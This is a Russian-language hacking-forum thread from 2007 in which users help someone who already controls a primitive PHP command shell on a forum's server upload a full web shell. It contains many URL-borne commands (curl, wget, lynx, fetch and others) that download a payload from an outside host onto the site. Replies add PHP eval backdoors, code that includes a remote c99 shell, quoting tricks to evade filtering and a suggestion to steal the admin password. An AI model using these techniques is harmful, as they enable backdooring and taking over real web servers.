загрузка шелла на зеноне

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
загрузка шелла на зеноне

Опции темы

Поиск в этой теме

Опции просмотра

загрузка шелла на зеноне

19.08.2007, 19:04

ysmat

Познающий

Регистрация: 20.04.2006

Сообщений: 67

С нами: 10556706

Репутация: -1

загрузка шелла на зеноне

у меня на форуме есть примитивный шелл вида
"<? system(\$cmd); ?>"
требуется залить файл полноценного шелла в папку uploads
перепробовал все известные загрузчики

curl wget get links lynx fetch GET lwp-mirror

Код:

http://***********/forum/cache/lang_cache/ru/1.php?cmd=curl --output /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=wget -o /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=get http://files.adamant.ua/3824 > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=links -source "http://files.adamant.ua/3824" > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=lynx -source http://files.adamant.ua/3824 > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=fetch -o /***********/www/forum/uploads/2.php -p http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=wget -o /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=curl -o /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=fetch -o /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=lynx -source "http://files.adamant.ua/3824" > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=links  -source "http://files.adamant.ua/3824" > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=GET http://files.adamant.ua/3824 > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=lwp-mirror http://files.adamant.ua/3824 /***********/www/forum/uploads/2.php

ни один не сработал
хотя шелл cmd работает
файл 1.txt создается
_http://***********/forum/cache/lang_cache/ru/1.php?cmd=echo текст > /***********/www/forum/uploads/1.txt
может еще есть какие методы загрузки
форум ipb 2.1.4 и находится находиться на хостинге зенон

𝕏 Twitter Reddit Telegram Копировать ссылку

19.08.2007, 19:09

SanyaX

.::Club Life::.

Регистрация: 28.01.2005

Сообщений: 1,205

С нами: 11200586

Репутация: 1398

Ты посмотри может там воще качалок нету. Или права на запись отсуствуют. Как писал уже качалки смотреть пример:which wget. И так и другие проверяешь.

__________________
-=Ok let's Go=-
-=OpenVPN=-

19.08.2007, 19:20

fly

Постоянный

Регистрация: 15.04.2007

Сообщений: 645

С нами: 10038327

Репутация: 251

создай файл abc.php
Затем впиши echo '<?php eval($_GET[cmd]);?>' в файл abc.php
то потом просто пиши
abc.php?cmd=$f=fopen($_GET[r],$_GET[rr]);$o=fopen($_GET[o],$_GET[oo]);while(!feof($f)){$row=fgets($f);fputs($o,$row);} &rr=r&oo=w+&r=http://www.yoursite.com/shell.txt&o=shell.php

19.08.2007, 22:00

ysmat

Познающий

Регистрация: 20.04.2006

Сообщений: 67

С нами: 10556706

Репутация: -1

не могу создать файл abc.php
с содержимым '<?php eval($_GET[cmd]);?>'
с простым текстом создается _http://*******/forum/cache/lang_cache/ru/1.php?cmd=echo текст > /*******/forum/uploads/abc.php
_http://*******/forum/cache/lang_cache/ru/1.php?cmd=echo '<?php eval($_GET[cmd]);?>' > /*******/forum/uploads/abc.php не проходит
вероятно не нравятся спец символы в '<?php eval($_GET[cmd]);?>'

19.08.2007, 22:08

NOmeR1

Познавший АНТИЧАТ

Регистрация: 02.06.2006

Сообщений: 1,187

С нами: 10495046

Репутация: 2642

Цитата:

Сообщение от fly

Зачем столько трудностей?
Содержание файла должно быть просто

PHP код:


		
			
<?

eval($_GET['cmd']);

?>

И вообще можно просто инклудить веб-шелл, например

PHP код:


		
			
<?

include('http://dermoshell.narod.ru/c99madshell.php');

?>

19.08.2007, 23:17

ysmat

Познающий

Регистрация: 20.04.2006

Сообщений: 67

С нами: 10556706

Репутация: -1

проблема в том что не получается вобще создать
файл с спец символами через строку браузера
например
http://**********/forum/cache/lang_cache/ru/1.php?cmd=echo текст > /**********/forum/uploads/2.php
все нормально на сервере создается файл 2.php с содержимым текст

http://**********/forum/cache/lang_cache/ru/1.php?cmd=echo <? eval($_GET['cmd']); ?> > /**********/forum/uploads/2.php
создается пустой файл 2.php код <? eval($_GET['cmd']); ?> не проходит

20.08.2007, 23:50

ysmat

Познающий

Регистрация: 20.04.2006

Сообщений: 67

С нами: 10556706

Репутация: -1

не проходят символы >< () причем перевод их в hex %3E%3C%28%29
не помогает как ето можно обойти

30.08.2007, 22:40

mister

Познающий

Регистрация: 24.07.2007

Сообщений: 31

С нами: 9895235

Репутация: 35

Код:

echo '<?php eval($_GET[\'cmd\']) ?>' > куда.php

обрати внимание на кавычки

Последний раз редактировалось mister; 30.08.2007 в 22:46..

30.08.2007, 23:39

Shagon

Новичок

Регистрация: 22.07.2007

Сообщений: 5

С нами: 9897439

Репутация: 0

Ммм а пасс админа если сныкать и залить из админки шелл в папку со смайлами?

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Загрузка шелла в 4images используя админ панель.	GrAmOzEkA	Уязвимости	7	06.03.2007 12:12
Загрузка шелла через JavaScript	olen	Болталка	6	03.09.2006 06:14
UBB Threads 6.5.1 (Инструкция по заливке шелла)	pch	Уязвимости CMS / форумов	0	30.04.2006 20:20
Вопрос про загрузку шелла в форуме IPB	africanec	Уязвимости CMS / форумов	29	28.09.2005 15:14

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход